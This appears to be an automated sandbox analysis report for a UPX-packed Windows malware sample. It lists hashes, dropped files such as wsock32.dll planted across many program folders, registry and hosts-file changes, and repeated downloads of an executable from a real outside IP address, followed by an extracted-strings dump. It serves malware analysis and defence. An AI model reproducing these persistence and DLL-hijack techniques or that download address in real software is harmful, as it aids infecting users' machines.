Analysis Date2015-05-12 23:52:31
MD5cfc6b6b70ddacb83b0eded93fe17eb14
SHA1680d844b056daf0bdbcc40c1fe38c44ab462f997

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionUPX0 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
SectionUPX1 md5: e8dc66f0e5417bd0316732e707c65714 sha1: 38b857dd42f149fb25bef3181bf0c815487a7076 size: 15872
Section.rsrc md5: 65c4c55fd1115370abcade11d8dbbbd6 sha1: 52ab4bf9ae45af8abaa8933c3d18656db58538e6 size: 512
Timestamp2008-06-25 11:47:28
PackerUPX -> www.upx.sourceforge.net
PEhash1307c071428b87b5d2265caa472123a1a8aebde0
IMPhash8bf1045c6407014343a435e1397e7c2e

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates Filec:\mfxixue.bat
Creates FileC:\WINDOWS\Tasks\alg.exe
Creates Processc:\mfxixue.bat
Creates Mutex\\xc3\\x96\\xc3\\x90\\xc2\\xbb\\xc2\\xaa\\xc3\\x8e\\xc3\\xbc\\xc3\\x91\\xc2\\xaa\\xc2\\xb9\\xc3\\xad2.3.5

Process
↳ c:\mfxixue.bat

Creates Processipconfig
Creates ProcessC:\WINDOWS\Tasks\alg.exe

Process
↳ C:\WINDOWS\Tasks\alg.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{H8I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}\ ➝
safeint\\x00
Creates FileC:\Program Files\Common Files\Adobe\TypeSpt\Unicode\Mappings\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\Web Folders\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bin\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\AcroForm\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Legal\Adobe Reader\7.0.0\wsock32.dll
Creates FileC:\WINDOWS\mfxixue.ini
Creates FileC:\Program Files\Common Files\Adobe\TypeSpt\Unicode\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Browser\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\AcroForm\PMP\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\_vti_bin\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\VGX\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\ImageViewer\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Messages\ENU\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Help\wsock32.dll
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Legal\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Javascripts\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Legal\Adobe Reader\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\DW\1041\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bin\1033\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\Linguistics\LanguageNames\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\VDKHome\ENU\wsock32.dll
Creates FileC:\WINDOWS\system32\drivers\etc\hosts
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins3d\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\Howto\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\Howto\images\wsock32.dll
Creates FileC:\WINDOWS\Tasks\\\xc2\\xcc\\xbb\\xaf.bat
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Program Files\Common Files\Microsoft Shared\DW\1028\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\Speech\1033\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\DW\wsock32.dll
Creates FileC:\Program Files\Common Files\Adobe\TypeSpt\Unicode\Mappings\Adobe\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\admisapi\wsock32.dll
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FileC:\Program Files\Common Files\Microsoft Shared\DW\1031\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Setup Files\wsock32.dll
Creates FilePIPE\lsarpc
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Annotations\Stamps\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\SPPlugins\wsock32.dll
Creates File\Device\Afd\Endpoint
Creates FileC:\Program Files\Common Files\Microsoft Shared\DW\2052\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\HowTo\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\admisapi\scripts\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\DAO\wsock32.dll
Creates FileC:\Program Files\Common Files\Adobe\TypeSpt\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\OLS\Locale\ENU\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Messages\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_aut\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Optional\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\servsupp\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\Templates\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\VC\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\Speech\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Multimedia\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\DW\1042\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\DW\1025\wsock32.dll
Creates FileC:\Program Files\Common Files\MSSoap\Binaries\Resources\1033\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Multimedia\MPP\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Help\ENU\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\HowTo\ENU\Images\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\Linguistics\Providers\Proximity\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\WebSearch\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\_vti_bin\_vti_adm\wsock32.dll
Creates FilePIPE\wkssvc
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\HowTo\ENU\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\admcgi\scripts\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\DW\1036\wsock32.dll
Creates FileC:\WINDOWS\Tasks\killbase.vbs
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\OLS\Locale\wsock32.dll
Creates FileC:\Program Files\Common Files\MSSoap\Binaries\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Annotations\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_adm\wsock32.dll
Creates FileC:\WINDOWS\Tasks\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\VDKHome\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\wsock32.dll
Creates FileC:\Program Files\Common Files\Adobe\TypeSpt\Unicode\Mappings\Mac\wsock32.dll
Creates FileC:\Program Files\Adobe\wsock32.dll
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\Font\wsock32.dll
Creates FileC:\Program Files\Common Files\Adobe\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\CMap\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\Linguistics\Providers\wsock32.dll
Creates FileC:\Program Files\Common Files\MSSoap\Binaries\Resources\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Esl\wsock32.dll
Creates FileC:\Program Files\Common Files\Adobe\TypeSpt\Unicode\Mappings\win\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\OLS\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\MSInfo\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\Triedit\wsock32.dll
Creates FilePIPE\DAV RPC SERVICE
Creates FileC:\Program Files\Common Files\Microsoft Shared\DW\1033\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Legal\Adobe Reader\7.0.0\en_US\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\ImageViewer\en_US\wsock32.dll
Creates FileC:\Program Files\Common Files\Adobe\TypeSpt\Unicode\ICU\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\_vti_bin\_vti_aut\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\Stationery\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\Linguistics\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Updater\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\DW\3082\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\TextConv\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\PictureTasks\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\web server extensions\40\admcgi\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Resource\Font\PFM\wsock32.dll
Creates FileC:\Program Files\Common Files\Microsoft Shared\DW\1040\wsock32.dll
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Annotations\Stamps\ENU\wsock32.dll
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\yF8lGTTDr0.pif
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex\\xc3\\x96\\xc3\\x90\\xc2\\xbb\\xc2\\xaa\\xc3\\x8e\\xc3\\xbc\\xc3\\x91\\xc2\\xaa\\xc2\\xb9\\xc3\\xad2.3.5
Creates MutexHDM
Winsock DNS218.61.15.91
Winsock URL ?mac=BvKX2e5WLQ&ver=2.3

Process
↳ ipconfig

Winsock DNS192.168.254.254

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\yF8lGTTDr0.pif

Network Details:

HTTP GEThttp://218.61.15.91/1.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://218.61.15.91/1.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://218.61.15.91/1.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://218.61.15.91/1.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://218.61.15.91/1.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://218.61.15.91/1.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://218.61.15.91/1.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://218.61.15.91/1.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://218.61.15.91/1.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://218.61.15.91/1.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1035 ➝ 218.61.15.91:80
Flows TCP192.168.1.1:1035 ➝ 218.61.15.91:80
Flows TCP192.168.1.1:1036 ➝ 218.61.15.91:80
Flows TCP192.168.1.1:1037 ➝ 218.61.15.91:80
Flows TCP192.168.1.1:1038 ➝ 218.61.15.91:80
Flows TCP192.168.1.1:1039 ➝ 218.61.15.91:80
Flows TCP192.168.1.1:1040 ➝ 218.61.15.91:80
Flows TCP192.168.1.1:1041 ➝ 218.61.15.91:80
Flows TCP192.168.1.1:1042 ➝ 218.61.15.91:80
Flows TCP192.168.1.1:1043 ➝ 218.61.15.91:80
Flows TCP192.168.1.1:1044 ➝ 218.61.15.91:80

Raw Pcap

Strings
h.h.
0"0'0,010<0I0S0h0t0E
0AUTORU(
%%0/c:\mf
0cu^y2
1&1,11$
1KdE!f
1/wm/updat
2F954E}\GHOSTBAK.exe
;2;@;M;b;
32.dll
|3.5{Y
4+96y>
4Eb<8B2
!50l9a
58:8A8F8K8Q8X8]8c8h8o8t8z8
?+?5?;?A?G?M?
>5F5X5_5k5p5x5}5
6$6)60656;6@6G6L6R6W6^6c6
!7&7-72787=7D7I7O7T7[7`7f7k7r7w7
7:@:G:V:`:e:k:}:
7hSa-DG
8-00AA
8#8*8/8
8_fdiM>}RLD&
8g98:o
|98l/"&
9-9A9H9n9
A218.61
'&a6XOSi
\Active Set,\Insta(ed 
ADVAPI32.dll
?Ah Us
aVirusv
<&<A<Z<l<s<
BHJLK}k
bufK(U
BYcov|5M
	bynumb
=c9&<t0
[,/CBDOcFS7AH6
ComponentA{H8IURB03-Ao
C/SfFnd
cycle.{645FF040-5081-101B-9
.datad
 DCZl%
deDCack
del "%s"	
df\NUSC!Xag$
dOwxn3
e#dd|my0
$Ed,w&
ef1ld_$6r
e{u?&f
ExitProcess
FWeYnSo
FWXp[\!\
GetProcAddress
h$+`C2r
h`F4Fp9
Hk:6Jnd
#hlDyj[	f
^hRp\Ra7%
http://
i6n6u6z6
-idx 0
InternetOpenA
IsWindow
>;>]>k>
KERNEL
KERNEL32.DLL
l6??2@YAPA
l9cra'@VL
la4WPp\;iYCas4
lD0mg#E
lEv<	}
LG<dL2r
ljg\P]
LoadLibraryA
LThis p
M:0x%x,
mnGaccept
M]S<PDF
MSVCRTA
MSVCRT.dll
n8shut
N  /dHb
Networkwb
&nvAdd
nvX/o+
o7ipc$fig
OBJECT 
Obj:("Ws
On ErPr Rp
opH\Ded	
OSsORtlI
ot be 
)P0v2d'D
'\ ps!/+0{%d.
pvXH4Q4
qV4V@1
RegCloseKey
RichCK
\SafeBoot
sBv3% 0
SectHbJJ6
SOFTWARE\Microfto
sS'k/]
S?Y?_?e?k?q?w?}?
Syts3S;
\Tasks\wsock
!This program cannot be run in DOS mode.
#=.=T=_=u=
t/v2vkV
UfD.EXE
URRENT_USER
USER32.dll
uvjOPz
ViewOf
VirtualProtect
VV$hxI(
vvz<O&
Vw;hc!
vwxyzABCDEFGHIJKLMNOPQRSTUVWX
WINDOWSEDM
WININET.dll
WS2_32.dll
$WSHEQP
wsprztf)
XPTPSW
`Y+ize*
-ZB7h7e1d2
Z;ppq~
z.WSyic